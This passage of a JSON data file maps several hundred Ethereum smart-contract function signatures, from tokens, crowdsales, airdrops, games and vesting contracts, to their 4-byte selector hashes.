"setAvatarFrom(address,string)": "0x4646f62a", "setAvatar(string)": "0x6ec5239f", "getAvatar()": "0xaa8b20f6", "getAvatarByNickname(string)": "0x20cc6889", "getAvatarByAddress(address)": "0x215cc031", "getAddressByNickname(string)": "0x31085c5f", "getNickname()": "0xabe4136f", "getNicknameByAddress(address)": "0xb013f637", "newUser(string,string,string)": "0xf5df6618", "newUserFrom(address,string,string,string)": "0x1d5ea379", "SToekn()": "0x98c16888", "doesProofExist(uint256,bytes32)": "0xaf519bf5", "notarizeHash(uint256,bytes32)": "0x15ca41c3", "voteEnd()": "0xddbe8f09", "getNextCutoffTime()": "0x47f8b863", "QCOToken(address,address,address,address,address,address)": "0xc3ac93df", "availablePercent(uint256)": "0x17df74f9", "availableAmount(uint256)": "0xb5c150d4", "Simpletokenq()": "0xb34b2c26", "SmthToken()": "0x47daf09c", "claimAccountOwnership(string,string,uint256,uint256)": "0x7bbf2300", "returnInvestoramount(address,uint256)": "0x23ec5939", "EscrowAccountCrowdsale()": "0x012fd089", "explodePhoenix(uint256)": "0x777a5dc5", "getTotalPayout()": "0xe362efdc", "distributeDividends(uint256)": "0x3243c791", "calculatePhoenixPoolCut(uint256)": "0x8908017f", "calculateCuts(uint256)": "0x6f7030f6", "setLowerPricePercentage(uint256)": "0x55e7a663", "setHigherPricePercentage(uint256)": "0xad559fd6", "setPriceCutoff(uint256)": "0x7365e1fd", "setCooldown(uint256,uint256)": "0xa50ed19b", "setExplosivePower(uint256,uint256)": "0x7b3cf41a", "setDividendPayout(uint256,uint256)": "0x5e0be75c", "getPhoenix(uint256)": "0x454aa6cf", "createMultiplePhoenixes(uint256[],uint256[],uint256[])": "0x1751dc90", "createPhoenix(uint256,uint256,uint256)": "0x9853b234", "closeBeta()": "0x0872c813", "CryptoPhoenixes(address)": "0xe2776ab8", "FHFToken()": "0x4ae12e9f", "startDistribution()": "0xd83623dd", "changeUnitUserBalanceLimit(uint256)": "0x76c46a70", "changeTotalAirdrop(uint256)": "0x0e686170", "changeValue(uint256)": "0xf965e32e", "JECKAirdrop()": "0xc807e645", "YclDoCoins(uint256,string,uint8,string)": "0x60b95da5", "VanHardwareResourcesChain()": "0x40d2e73c", "GOX(uint256,string,string)": "0x10314b07", "AuctusToken()": "0x3b172fb9", "INDInflationVesting()": "0xe328ef67", "LinkNaturePower()": "0x7b4938c3", "PublicLayer()": "0xd7baa041", "SmartSweep()": "0xdab12beb", "Martcoin(uint256,string,string)": "0x9844d5a7", "CryptoSagaArenaRecord(address,address,uint8,uint8)": "0x02a5c0be", "TheGoDgital()": "0xc7edaf33", "TICToken()": "0x53c048ce", "SetLockDate(uint256)": "0x7c0e2a5a", "transferFundAndEndGame()": "0xc8a5e6d7", "endGameInternal()": "0x38a74bbf", "endGame(address,uint8)": "0x00203116", "beginGame(address,uint64)": "0x97b817c9", "changeStatus(uint8)": "0x95bc9538", "TeamToken(string,string,address)": "0x8a36c3dc", "Petrocoin()": "0x788ac4a8", "changeFree(uint256)": "0xbabf5e37", "getInterestCount()": "0xedfb4191", "ownerPutInterest(uint256)": "0xc083455f", "ownerPutCapital()": "0x7f460693", "getAssetCount()": "0xa0aead4d", "ownerAddAsset(string)": "0xc1b16cb0", "getPayeeCount()": "0xda26ebc2", "ownerEnablePayee(address,address)": "0x5f412ff1", "ownerDisablePayee(address,address)": "0x5c016b91", "ownerSetExchangeRateInWei(uint256)": "0x09f14e7e", "ownerResumeContract()": "0xb9934b9e", "ownerPauseContract()": "0x79f90d6c", "payeeWithdrawCapital()": "0x8faf682d", "payeeWithdrawInterest(uint256)": "0xededb770", "interestOf(address,address)": "0x0b48af0b", "ownerDepositInterest()": "0x432a84d9", "initialize(string,string,uint256,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x2024617e", "CryptoABS()": "0xed24e3e0", "WTBNToken()": "0x9cdf8a1f", "setBenificiary(address)": "0xb988899f", "getWeiBalance(address)": "0xc1f16bdc", "getPrivatePreSaleTokenBalance(address)": "0x2ae418a4", "buyPreSale(address,uint256)": "0xee0186b6", "VernamPrivatePreSale()": "0x91ad1ada", "circulatingSupply()": "0x9358928b", "VernamCrowdSaleToken()": "0xb523d13c", "isKYCApproved(address)": "0xe77db232", "setControler(address)": "0x5f5f62f9", "setBurner(address)": "0xa996d6ce", "OwnableToken()": "0x2ad12937", "Caligula()": "0x55efe565", "getMessageOfVisit(address)": "0x0fb66da3", "recordVisit(address,string)": "0x780d2328", "whoIsTheOwner()": "0x220f52c5", "ITSToken()": "0x7c399142", "R2Xtoken()": "0x20b7ceb8", "unFreezeAccount(address)": "0x53cc2fae", "addDistributionContract(address)": "0x12778e8d", "TAKE()": "0x3aac430c", "toBRFWEI(uint256)": "0x6da9a969", "allocateUnsold()": "0xf309e3c5", "getRateByStage(uint256)": "0x7868c89d", "getCapByStage(uint256)": "0x172419a8", "getStageCap(uint256)": "0x35013592", "getTokenRate(uint256)": "0xe9739db7", "advanceEndTime(uint256)": "0xf812f423", "refundInvestors()": "0x80c399f4", "allocateTokens(address,uint256,uint256,uint256)": "0x9a903ca7", "initializeContract()": "0x9eb32fdb", "BRFCrowdsale(uint256[3],uint256[3],uint256[3],uint256[3],address,uint256,uint256,address,uint256,address)": "0xa6dc0173", "drop(address,uint256)": "0x8d0f8cef", "snapshotUpdate(address,uint256,string)": "0x3d3c3f2d", "snapshot()": "0x9711715a", "TokenHolderSnapshotter(address,address)": "0x2a882d1d", "LINCToken()": "0x45977ebb", "inWhiteList(address)": "0x69e0e346", "token2Player(address,uint256)": "0x3b2dbb7f", "createPromoPlayer(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xbca915c7", "setRandomPlayerAddress(address,address)": "0x28889862", "setPromoEndTime(uint256)": "0x86773cae", "BSMinting()": "0xf5cc4056", "gen()": "0xb42dfa0d", "isRandomPlayer()": "0x98cb12dc", "_isIdle(address,uint256)": "0xaa1cf23e", "_createPlayer(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x3ce17f24", "isPlayerIdle(address,uint256)": "0xf2b841c0", "isTournament()": "0x64dde40f", "SuperiorBit()": "0xeea5ac01", "GEMERAToken(address[50])": "0x13193936", "setRestrictedAddress(address)": "0x98973f2b", "getBurnAddresses()": "0xb968a53c", "burnAll()": "0x9975038c", "BurnableToken(address[50])": "0x867387d4", "mod(uint256,uint256)": "0xf43f523a", "Recoverable()": "0x683a6858", "developer_string_symbol(string)": "0xfa7a6cd3", "Voter()": "0xfa193a6e", "developer_increase_prices(uint256,uint256)": "0xea33dd24", "developer_Transfer_ownership(address)": "0xcc98c893", "Inventor()": "0x92aaa019", "totally_decrease_the_supply(uint256)": "0x65d9df9c", "developer_How_To(string)": "0xc1fb9b9e", "developer_edit_name(string)": "0xb8ba532f", "developer_update_Terms_of_service(string)": "0xdbb3cef3", "developer_string_contract_verified(string,string)": "0x5f0d995b", "developer_edit_text_Exchanges_links(string)": "0xfe73bf21", "developer_edit_text_crowdsale(string,string)": "0x356fefb3", "developer_edit_text_price(string)": "0xfa130b68", "show_automated_Buy_price()": "0x47356bd9", "Show_automated_Sell_price()": "0x5052587f", "show_Balance_available_for_Sale_in_ETH_equivalent()": "0x4fe7940b", "sell_toContract(uint256)": "0x7e111f59", "buy_fromContract()": "0x0ed9b97b", "early_supporters_distribution(address[],address,address,uint256)": "0x7c7dc098", "transfer_Different_amounts_of_assets_to_many(address[],uint256[])": "0x83ac98fe", "CCTOKEN()": "0x6eaa0f16", "AlforroCoin()": "0x9a9b5323", "depositEtherForRefund()": "0x2a76ffae", "setMaxAmount(uint256)": "0x4fe47f70", "setMinAmount(uint256)": "0x897b0637", "IndividualCapCrowdsale(uint256,uint256)": "0xfb741504", "INCXToken()": "0xe992ae5a", "resumeMinting()": "0x59ae340e", "TCCCoin()": "0xaf7e8577", "sAssert(bool)": "0x139949fa", "Internet()": "0xf37633f9", "sendInvestmentsToOwner()": "0x9779dcd9", "BM_MasterClass_Reserved()": "0xa7abb8cc", "FirstTradingEcosystemCoin()": "0xa322d49e", "setBountyTokensWallet(address)": "0xfa8b72ff", "setFoundersTokensWallet(address)": "0x2f48c4aa", "setMultisigWallet(address)": "0x64913477", "setBountyTokensPercent(uint256)": "0x59169d06", "setFoundersTokensPercent(uint256)": "0xada199dd", "setPercentRate(uint256)": "0x480b890d", "setNextSale(address)": "0x52d63b7e", "setSoftcap(uint256)": "0x101e5a32", "currentMilestone()": "0xb0304813", "lastSaleDate()": "0x29dd0b86", "clearMilestones()": "0x4c94ac6a", "insertMilestone(uint8,uint256,uint256)": "0x9dc905bb", "changeMilestone(uint8,uint256,uint256)": "0xbd17647f", "removeMilestones(uint8)": "0x41ba9a17", "addMilestone(uint256,uint256)": "0x5601477b", "setHardcap(uint256)": "0xe28fa27d", "milestonesCount()": "0xab36e4a6", "setSaleAgent(address)": "0x14133a7c", "withdrawLockupTokens()": "0x21d53fb9", "fixAddress(address,uint256)": "0xa41d0584", "StandardTokenDeployable(string,string,uint256,uint256,address)": "0x8290d1e0", "TetherGBP()": "0xe6fff409", "withdrawAllEther()": "0x31c91117", "withdrawAllTokens()": "0x280da6fa", "addDecimals(uint256,uint256)": "0x2f684b83", "burnAllTokens()": "0xc17e2aa1", "setCurrentState(bool)": "0x760ee49c", "forwardFunds(uint256)": "0xc8997121", "getContributorByNumber(uint256)": "0x35bf90ca", "getContributorByAddress(address)": "0x779a5a7f", "addContributor(address,uint256)": "0xe0bd7d15", "payContributorByAdress(address)": "0x897c8613", "payContributorByNumber(uint256)": "0x90063fd4", "calculateTokensToSend(uint256,uint256)": "0x474bbab2", "CrypteloPublicSale(address,address,address,address)": "0x70b3c7de", "currentTimeBonus()": "0xe3967d6a", "isWhiteListed(address)": "0x6f9170f6", "isWhiteList(address)": "0xf99031a7", "canMovetoken()": "0x822ee26c", "isWithinIEO()": "0xe027034d", "convertToEther(uint256)": "0xf3161022", "BST()": "0x4aa735c0", "mediate(uint256)": "0xe56b3e68", "releaseUnlocked(address,address,uint256,uint256)": "0xe664214a", "release(address,address,uint256,uint256)": "0x16afdf8e", "isUnlocked(address,uint256)": "0x30dbb4e4", "issueExchangeRate(address,address,address,uint256,uint256,uint256)": "0x9c79af26", "referalBonus()": "0x63e0f8c7", "proof()": "0xfaf924cf", "deathData_f13()": "0x6104d75a", "tournamentDataIPFSHash()": "0x570b615a", "totalPaid()": "0xe7b0f666", "BONUS_DURATION()": "0xa013ad54", "mediumCount()": "0xc85147c5", "secondStageMinting()": "0xf3bd27a4", "referalAirdropsTokensAddress()": "0x3a3e49fe", "zoPrice()": "0x94efadea", "promoEndTime()": "0x404a9272", "weiRaisedInPresale()": "0xf4d3e94f", "votesForAnswer()": "0xe623a93b", "sellPrice_wie()": "0xa2ee1a27", "total_coins()": "0xc8f5d8b0", "CONFIRM_LIMIT()": "0x9e3b94f1", "mainSaleMinPaymentWei()": "0x478f7b52", "VOTING_END_TIME()": "0xa201d102", "SHNZ()": "0x7a118fdc", "SALE2_RATE()": "0x5abc52d4", "totalAllocatedTokens()": "0x0c195d99", "getMyAllowance()": "0xa092ae25", "burnSequence()": "0x67602c59", "Standard_5()": "0xbebe4f6d", "winnerCounter()": "0xa1e0c2c9", "etherAddress()": "0x0786f72b", "manualEmissionEnabled()": "0xc9bba27b", "multDenominator()": "0xc5bdbd70", "lottoQueue()": "0xf323a061", "directorLockUntil()": "0x79564072", "dnaMixer()": "0x675a4633", "TeamSupply()": "0xdc13352a", "charityPercent()": "0x4a8cbae1", "auction()": "0x7d9f6db5", "deal_cancel_rate()": "0x051a65dd", "isICOStarted()": "0xec2f39b4", "TakeMyEtherTeamAddress()": "0x5de52fb7", "AUDITED_AND_REJECTED()": "0xccc72302", "_devTokens()": "0x7560a8d9", "Proof_of_Stake()": "0x47f9c371", "COMPANY_SHARE()": "0x306e3e99", "doubleClaimSegmentSlashAmount()": "0x6d7221d5", "ztToken()": "0x19e66508", "cancelRewardsWithdrawal()": "0x8751775b", "DEVELOPER_supply()": "0x6cdcb1ca", "maxMinutesProposalPeriod()": "0x99ecba80", "collectedUSD()": "0x1ff6c241", "saysomething()": "0xb0c74430", "factHash()": "0x93854494", "minVotes()": "0x3cc228fd", "whitelistedPlannedContributions()": "0xa8bc3a6c", "platPriceOracleContract()": "0xc791e16b", "saleEnd1()": "0xf7f4b9d4", "unlockedTeamAllocationTokens()": "0xcd729a91", "bntyMicrodollarPrice()": "0xb8d415c9", "MAXIMUM_CONTRIBUTION()": "0x6c57c01f", "pastOneHour()": "0x3033f4d3", "commissionGetter()": "0x3651b401", "card_start_minamount()": "0x2f27b556", "totalGivenBountyTokens()": "0x43441a2c", "operationAmount()": "0xb1efc755", "deleteAllMessages()": "0xdf63e659", "totalWhitelistedFunding()": "0xc1e68672", "webGiftTotalAmount()": "0x28bb6f24", "nextOpenRewardTime_()": "0xab1547d2", "volunteerWrite()": "0xbf0f5495", "FEE_CHARGER_DENOMINATOR()": "0xc55c4115", "callgSoftCap()": "0x016f34ad", "maxBidInCentsPerAddress()": "0x71c9572b", "offer_id()": "0x4ddfd20f", "immortals()": "0x0d869ada", "presaleTokenVault()": "0x541a01ed", "TOKEN_SCALE()": "0xcae07d2a", "preICOPrice()": "0xca18ebbf", "moreTokenPerEtherForPresaleRound()": "0xe5d787f2", "refundContribution()": "0x53734dc5", "level_3_amount()": "0x05b5711d", "bountyOwner()": "0x9db069d8", "houseEarnings()": "0xcfe30939", "emptyWrongEther()": "0xd80b2056", "entranceFee()": "0x649677e1", "Founder3()": "0x470905b1", "maxFee()": "0x01f59d16", "MAX_LAYERS()": "0xc829b0e3", "deathData_f18()": "0xbe9e3774", "systemSupply()": "0x1f7e495b", "fundsOut()": "0xb2ead7bb", "personalMincap()": "0xdb723e73", "scannedGoldCaps()": "0xbf3da865", "secondTarget()": "0x9e3b9dc1", "minConversionRate()": "0x86f254bf", "withdrawAllocation()": "0xee224707", "openTimer()": "0x92f351f9", "GraphenePowerCrowdsale()": "0x0f75806f", "MAINTENANCE_FEE_PERCENT()": "0x4d4c277d", "discountDecimal()": "0x5edc1ac8", "transferEnabled()": "0x4cd412d5", "retentionMax()": "0x22bb4f53", "getCurrentTokensPerEther()": "0x5e402ae2", "goldName()": "0x08d6b4b9", "LaoHuiHui(uint256,string,string)": "0xc6e0329f", "changePaused(bool)": "0x38421476", "changeAirdropTotalQty(uint256)": "0x2f2d9109", "changeAirdropQty(uint256)": "0xb96b8edf", "_destroyTokens(address,uint256)": "0x56c7eb7c", "_generateTokens(address,uint256)": "0xaaaf9595", "_freeze(address,uint256,uint8)": "0x1cd95d2a", "COCToken()": "0x19018557", "transferOfPower(address)": "0xed5667b4", "COCTokenBase(uint256,string,string,uint8)": "0x68019d75", "bytes32ToString(bytes32,bytes)": "0xd08a787c", "unregisterAddress(bytes32)": "0x2bbd9530", "registerAddress(bytes32,address)": "0x662de379", "itemCount()": "0x6bfb0d01", "LirkToken()": "0x2f39bf80", "Obirum()": "0xadcccb6f", "drops(address[],uint256)": "0x6e7b698f", "talkToWorld(string)": "0x0801baca", "FeitebiToken(uint256,uint8,string,string)": "0xfd68e463", "update_bitcoin_ratio(uint256)": "0x2e831cd1", "update_eth_ratio(uint256)": "0x05e2b66a", "FranklinFrank()": "0xc39ce8b6", "_transferadvanced(address,address,uint256)": "0x00319aad", "closeCurrentStage()": "0xbab1d921", "mint(uint256,uint256,address,uint256)": "0x706ff617", "setParams()": "0xb73ded75", "KICKICOCrowdsale(address,address,address,address,address,address,address)": "0x3c6eab08", "ArtcoinPlaceholder(address,address)": "0xe07cd936", "claim_winnings(address)": "0x9a20821b", "host_claim_earnings(address)": "0x5ae23da2", "host_reveal(uint256)": "0x50a5c872", "steal_reveal(address,uint256)": "0x332eb83e", "host_lottery(bytes32)": "0x60c7bb5a", "cancel_lottery()": "0x79808552", "VRYCoin()": "0x00354975", "setData_6(uint256)": "0x1146015e", "setData_5(uint256)": "0x20250264", "setData_4(uint256)": "0x7a16cbe3", "setData_3(uint256)": "0x12035ca6", "setData_2(uint256)": "0x5e0b4cb6", "DTCC_ILOW_2()": "0xbcb7f880", "getCodeHash(address)": "0x81ea4408", "MYEX()": "0x4d0e8a5f", "Casinowo(uint256,string,uint8,string)": "0x81fedc73", "getTotalMined()": "0x8c2d1549", "recoverAll()": "0x6899d8c2", "ethMined()": "0x69215eb3", "getOscar()": "0x904740cd", "setOscar(address)": "0xd89b8057", "getAbel()": "0x9b3235bf", "setAbel(address)": "0x5ff4909b", "Minado(address,address)": "0x623d2295", "releaseSecondUnlock()": "0x615815f5", "releaseFirstUnlock()": "0x65fcf1b5", "TAXToken()": "0x860241c2", "changePaymentContract(address)": "0x489d2104", "getAllPolicies()": "0x457e5521", "getMyPolicies()": "0x81710c78", "createContract(string,address,address,string)": "0x31cbf288", "PolicyRegistry(address)": "0x94ffe2c7", "revokeContract()": "0x66625bbd", "addInsuranceProduct(uint256,uint256,uint256,string,string,bytes32)": "0xdcbe7cf1", "Policy(string,address,address,string)": "0x8bd50488", "MAGENDAVID()": "0x385794c4", "StrongHands()": "0xd5dcc638", "getBagDetails(uint256)": "0xf2342bba", "Stocks()": "0xd6ef3de2", "setBuyLimits(uint256,uint256)": "0x0da2c5f0", "BurnableCrowdsaleToken(string,string,uint256,uint256)": "0x35b6df5d", "initialSupply(address)": "0x913093aa", "CrowdsaleToken(string,string,uint256,uint256)": "0x423fb140", "burnOwnerTokens(uint256)": "0x49f9f4d0", "internalBurnTokens(address,uint256)": "0xe38787aa", "setOwnerBurner(address)": "0x37989eb6", "isAddressNotEmpty(address)": "0xf5f2669b", "requireValidAddress(address)": "0xfa725ea3", "mintTo(address,uint256)": "0x449a52f8", "calculateRate()": "0x919beeb1", "LSDCrowdsale()": "0x7850b72f", "LSDToken(uint256)": "0x08a60004", "BITWORKCOIN()": "0x74e104d3", "fundsToBank()": "0x3a0d649a", "ShopManager(address)": "0x72470a14", "emergencyWithdraw(uint256,bool)": "0xbb5b3edc", "startUnlock()": "0x7baf5b84", "EnchantedShop(address,string,string,uint256,uint32,uint256)": "0x0715ec34", "ElementeumTokenProxy(uint256,address[],address[])": "0x97e484d2", "ElementeumToken(uint256,address[],address[])": "0x3c71b186", "HappyBeeToken()": "0x957ac9ad", "Biniu(uint256,string,string)": "0x9035b4ff", "MiddleClass()": "0x484cb173", "chargebackCoins(uint256,address)": "0x45f09140", "issueCoins(uint256,address)": "0x9d7e2730", "TUDOR()": "0x42af4821", "setTokenRate(uint256,string)": "0xc178fc87", "MoonToken(uint256,string,string)": "0x6dbe4bee", "isLocked(uint256,uint256,address,address)": "0xd17f7142", "transferBalanceToOwner(uint256)": "0xcbcdc2e4", "FourArt(address,address,address,address,address,address,address,address,address,address,address)": "0xde815e61", "LunarLink()": "0xcba01a49", "applyForTokenOneDay()": "0xc71eef58", "updateFinishFlag()": "0x969ef40d", "startDistribute()": "0xb8415b0c", "configContract(uint256,address[],uint256[],uint256[],uint256[],uint256[])": "0x1a81a01f", "clearConfig()": "0xacb62d7c", "updateCancelDistFlag()": "0xe909f2cc", "cancelDist()": "0xda30d418", "Erc20Dist()": "0xe9ffdf28", "SunflowerToken()": "0xa026d7c4", "KRE8()": "0x56c8eaba", "setNewMiner(address)": "0x05398d45", "withdrawEtherInBatch(address[],uint256[])": "0x247956f1", "withdrawInBatch(address[],address[],uint256[])": "0x48de0cdc", "Octogram()": "0x30d4b967", "GKBToken(uint256,string,string)": "0x73d9170d", "Woyager()": "0x02a566bd", "LeajoeToken()": "0x5f7eed5d", "RandomWinner()": "0xb5bf4c74", "UpdateNumPlayers(uint256)": "0x00d9f24e", "PassportToken()": "0x98969906", "GetherCoin()": "0x86cf1e39", "XBStandardToken(uint256,string,uint8,string)": "0xaee1b8a1", "VerixChain()": "0x0187699c", "BaoMaToken()": "0xad621b14", "Casa()": "0x6cd902d0", "fireDeliveryProposalEvent(address,uint256)": "0x3339451b", "fireCloseProposalEvent(address,uint256)": "0xdccc6c94", "fireCancelProposalEvent(address,uint256)": "0x770f75b7", "transferStorage(address)": "0x0553b805", "Modultrade(address,address,address,address)": "0x8fa6da99", "cancelMtr(uint256)": "0xabf2b5b9", "cancelEth(uint256)": "0xef21059e", "closeMtr()": "0xcfc19710", "closeEth()": "0xcaf807a1", "delivery(string)": "0xfa26fe32", "mtrTokenFallBack(address,uint256)": "0x23d71b26", "setPaid(address)": "0xc7192e44", "setFee(uint256,address)": "0xb4f2e8b8", "ModultradeProposal(address,address,address)": "0x8c9b2cd1", "firePaidProposalEvent(address,uint256)": "0x3103fa26", "getCountBySeller(address)": "0x5fde0ed5", "getProposalById(uint256)": "0x3656de21", "getProposalsBySeller(address)": "0x0778425a", "insertProposal(address,uint256,address)": "0xf04182d8", "ModultradeStorage()": "0x5ca8e2ad", "Deployer()": "0x967c33b3", "endVesting(address)": "0xbf05d653", "vestingEnded(address)": "0xfe0c4085", "getVestingEndTime(address)": "0x15875f54", "getVestedAmount(address)": "0xd5a73fdd", "addVesting(address,uint256)": "0x95fcb00d", "BDLToken()": "0x853f7e98", "CulturePhilosophyFaithChain()": "0x1fb47fe8", "withdraw_excess_tokens()": "0xec7c2ef7", "TokenLiquidityMarket(address,uint256,uint256,uint256)": "0xc8b32089", "TheExtraordinarySpacemen()": "0xd1c43558", "_validatePurchase(address,uint256,uint256)": "0xa5460352", "delegatecall_selfdestruct(address)": "0x301d5209", "postGood(bytes32,uint256)": "0x00ea3146", "getGoodPrice(bytes32)": "0xbcd61c6a", "getGoodDecision(bytes32)": "0xec3a6d64", "getGoodPreset(bytes32)": "0x6ccde640", "setGood(bytes32,uint256,uint256)": "0xfffa9d0c", "transfertokenContract(address)": "0xe7f0a865", "XERA()": "0x9e1ad320", "Ethereumwhocoin()": "0xec149de9", "freeXLMG()": "0x80d10934", "closeDeposit()": "0x45c917ec", "openDeposit()": "0x12c55a9b", "ApprovedToken()": "0xda8f410a", "AIChain()": "0x83c68f48", "CostilNetworkToken()": "0x49e51970", "DONC()": "0xe0c104ad", "TerraEcoToken()": "0xc815c9ef", "removeBlack(address)": "0xd283859d", "addBlack(address)": "0xeb794dd7", "StopTransferGuard(address[])": "0xf81b1998", "TokenCDCQ(uint256,string,string)": "0xd76a130a", "unblacklist(bytes32)": "0xbfebb947", "blacklist(bytes32)": "0x55642e53", "_pay_token_commission(uint256)": "0xec82bf91", "changeMinimumCommission(uint256,uint256)": "0x635875d9", "transferCommissionGetter(address)": "0xed9d7dd3", "FANBASEToken()": "0x755dc018", "getGameCountdown()": "0xdf0f3c19", "getBaseToQuoteReturn(uint256)": "0xab6e79ed", "stepBonusList(uint256)": "0x9eb9c68f", "setInviteCode(string)": "0x930916b2", "operationList(uint256)": "0x8989851c", "initQuoteBalance()": "0x8449133b", "setInviteCodeFree(string)": "0x74fa98f5", "getMyInviteCode()": "0x67e1c253", "getQuoteToBaseReturn(uint256)": "0x21daae34", "EEYcoin(address)": "0xa9cf037a", "myfichain()": "0xd9ea372b", "getStuckCoin(address,uint256)": "0x20b1b0ab", "setAmout(uint256)": "0x89976229", "setNVTface(address)": "0x319288d8", "Bitsurge()": "0x586a4be5", "GoldenGate()": "0xc89baff5", "bountySupplyRemaining()": "0xd92da8f8", "PRICE_EXPONENT()": "0xf36b135d", "maxnumber()": "0x0dc3279d", "numOrders()": "0x45d53788", "EthersRaised()": "0xcb5bf9b8", "totalWeiWon()": "0x15c12d4d", "lockReleaseTime()": "0x209878b9", "BONUS_WINDOW_2_END_TIME()": "0xd81f9830", "multisigPreICO()": "0xcc78cc98", "percentRate()": "0x8090114f", "preSaleSecondCap()": "0xccd6aca4", "mainAddress()": "0x0cdd4234", "reserveTeamRecipient()": "0x782037dc", "weiFounded()": "0x37bdc146", "unmined()": "0x1077666e", "UBTC()": "0x86d4c423", "stageEco()": "0x5c8e7376", "bountymanager()": "0xa8d5308c", "reflectSwitch()": "0xd2161687", "landmarkSize()": "0x9240f699", "LOCKAMOUNT3()": "0xcc8e4bc2", "emissionlocked()": "0x73f00fb3", "lastBlock_a17()": "0xa39b10d2", "firstPrivateReleaseTime()": "0xd189b98d", "nextCandidateId()": "0xd16ff4c8", "payoutcount()": "0x10282b61", "allowBuying()": "0x0c5a534e", "recipient1()": "0xaa3744bd", "unique_players()": "0xdd4314b2", "setMintingCompleted()": "0xff7c9329", "highestBidderCC()": "0xe7da257f", "SHIP_SLOTS()": "0xaff4cbea", "totalSupply_()": "0x324536eb", "lockedBitmask()": "0x3862ea9d", "proofAddr()": "0xc661ee4d", "investorsStorage()": "0x4215da7d", "tokensSuppliedFromReferral()": "0x4f75af3a", "stageFourEnd()": "0xb1ed8c99", "extraTokensWallet()": "0x72675562", "ZenixSupply()": "0xe984dd74", "shopDoublet()": "0x946a893d", "tokenExchanged()": "0xb42072e4", "MANAGEMENT_LOCKED_PERIOD()": "0x83e19a95", "Buy_Wall_level_in_wei()": "0x4aa669d8", "dt()": "0x3fdb8cbd", "totalstakeamount()": "0x47582291", "RESELLING_UNLOCK_COUNT()": "0x9600ead9", "CLOSING_TIME()": "0x53865562", "privateSaleSoldTokens()": "0x5fb3b944", "periodPreITO_weiPerToken()": "0xa8915c7e", "WhitelistContract()": "0xc6979c0a", "MAX_UNICORNS_TO_GIFT()": "0xd64b12cf", "gas_price_max()": "0x7520bf60", "SALE_FUNDS_ADDR()": "0x6b52a071", "TOKEN_TOTALSUPPLY()": "0x74c950fb", "ResearchGroupAddr()": "0x880c7864", "isRequireData()": "0x3ef39571", "startTimeRound2()": "0xd3f60d9c", "agentAddress()": "0x38613690", "resetOwnership()": "0x19077dca", "bountyOfflineTokens()": "0x492eec25", "earlyPariticipantWeiPrice()": "0xd4ba15ad", "ONE_QUINTILLION()": "0xb663dc0a", "gameTotalGen()": "0xd020ae40", "rew()": "0x1fe55867", "isCrowdsaleFinalized()": "0x349b586c", "whatRound()": "0x032fc13b", "AgriChainLabel()": "0xf07c0b21", "ONTTotalSupply()": "0xce3fff35", "megabossCutPercentage()": "0x21a6c7aa", "rateETH_BCDT()": "0x3ecf965f", "ethFundsWallet()": "0xa487fd07", "startRoundC()": "0x3e5daf02", "CindicatorTalk()": "0x89ad50e3", "secondTokenExchangeRate()": "0x19218eda", "postIcoPhaseCountdown()": "0xbefda2ff", "hatchingSpeed()": "0x220c166c", "SINGLE_BLOCK_LEN()": "0xad9a9f17", "mtStartTime()": "0x7740f667", "getNumBettings()": "0xad92e46c", "battleProvider()": "0x5604af49", "PLAYER_METADATA()": "0xf82fe152", "timeFactor()": "0x822daf60", "isIcoOver()": "0x0f19f92a", "showInterval()": "0x1260c19a", "J8T_DECIMALS_FACTOR()": "0x498b7718", "sendPer2()": "0x45f536f7", "currentLuckyStoneNumber()": "0xcfd3c17d", "stage3Bounty()": "0xa66f32e5", "MAX_ETHER_24H()": "0xe02df495", "referrerLevel2Ether()": "0x0050945d", "bonussale_StartDate()": "0x8dfef745", "ICOPRICE()": "0x8f571461", "MAX_USER_TOKENS_BALANCE()": "0x613f5fe8", "creditor()": "0xe36db785", "getBuySellSum()": "0x24646ce4", "depositSuccessful_()": "0x030cc118", "DEV()": "0xc1eb5ddd", "purchasePeriod()": "0xdf0f093b", "VESTING_DURATION()": "0x4cfc4d30", "MAX_INVESTOR()": "0xd39bbf06", "duplicate()": "0x1f922d06", "destTokensDevs()": "0x5bd475fd", "expItemClass()": "0x0c9b016c", "maxAvailableForSale()": "0xb1bd7683", "eth2mnt()": "0x1202be01", "noTokenLocked()": "0x2a7806e4", "stage2NotReached()": "0xb5e35248", "YEAR_THREE_SUPPLY()": "0x1989d175", "restrictedTokensDate()": "0xb0827f42", "token_b()": "0xe52858c6", "tokenAvatar()": "0xccbd8d29", "puntAmount()": "0x14686ac2", "resolveTime()": "0x05ed76c4", "stagesManager()": "0x0b5ba082", "firstRoundCosmosDiscount()": "0xbc15be93", "TimeEnd()": "0x52bd9914", "RESERVED_TOKENS_FOR_CRYPTO_EXCHANGES()": "0xfafd4bba", "StatPreICO()": "0xb7009c97", "voteEnds()": "0x85defaf4", "refundingDeadline()": "0x2d5b778b", "watcher()": "0xd6b74865", "refundPlayersAfterVeryLongGame()": "0xedfe676b", "Currentproposal()": "0x34d56b0a", "bonus01()": "0xcbec09a7", "termsAndConditions()": "0xf678462f", "licenseCostDenominator()": "0x4c5a2044", "getRequestsLength()": "0xc8cf4722", "closed_()": "0x1c169ba5", "ZJFPrivate()": "0x6144a8a1", "block0()": "0x626340b2", "mintingState()": "0x0e6d3a89", "whitelistBonusPercentage()": "0x6ccc3bdd", "weekTwoPriceRiseBegin()": "0xa3666d23", "tokensPerWei()": "0x22d60d17", "limitPerHolder()": "0xfc9c473d", "TICK_TIME()": "0x02c9972c", "lastTokenPriceWei()": "0x3ab966f4", "BUY_ME()": "0xfb6168ac", "organisationWallet()": "0xdd905097", "PRE_SALE_GMRP_TOKEN_CAP()": "0xf6afe805", "refund_window_end_block()": "0x22aa7196", "peg()": "0x1f1cb62b", "privateSaleStartDate()": "0x86d2fe57", "Amount_of_AOC_for_One_ETH()": "0x17e2912f", "tokenUriPrefix()": "0xfce87fb0", "Token_Price()": "0x5bdaa6dd", "totalPaidOut()": "0x1357e1dc", "SNAILMASTER_INCREASE()": "0xa7985ae4", "blacklister()": "0xbd102430", "INITIALSUPPLY()": "0xde6ab39c", "houseWithdraw()": "0xbe220272", "pecul()": "0x83b3c85f", "AgriChainRootData()": "0x3ea3e42f", "ADVISOR_REWARD()": "0xb3070c12", "onceAddTime()": "0x16496a15", "tokenPerEther()": "0x2f77dba4", "coinIssuedIco()": "0xb245d6da", "stopBlockjack()": "0x64b837ab", "feeBps()": "0x24a9d853", "beforeSale()": "0x6898f148", 